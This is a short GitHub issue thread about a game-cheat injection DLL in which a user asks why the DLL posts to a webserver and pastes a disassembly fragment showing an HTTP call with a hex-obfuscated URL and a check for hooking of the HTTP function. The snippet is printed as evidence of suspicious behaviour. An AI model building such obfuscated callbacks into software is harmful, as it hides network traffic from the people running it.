### ISSUE TITLE
Why does the DLL have to post to a webserver

### ISSUE THREAD

**Issue by Gubbi099** [EnigmaGMod/Gizeh#1]
Why does it have to post to a webserver, seems suspicious. 

`.text:1001149C                 mov     [ebp+var_4], 0
.text:100114A3                 push    offset aHgfdgDebug_get ; "',hgfdg=debug.getinfo(HTTP).what,jkgfv="...
.text:100114A8                 lea     eax, [ebp+var_2B0]
.text:100114AE                 push    eax
.text:100114AF                 push    offset aHttpUrlX68X74X ; "HTTP({url='\\x68\\x74\\x74\\x70\\x73\\x"...
.text:100114B4                 lea     ecx, [ebp+var_2F4]`

![dump](https://user-images.githubusercontent.com/42849023/52511245-66088500-2bff-11e9-9f8a-4c6b6d679d0b.png)

**Comment by djtb2924** [comment]
Easy method to inject with DLL but you can go to the site but if you want recompilate you can we have published the source
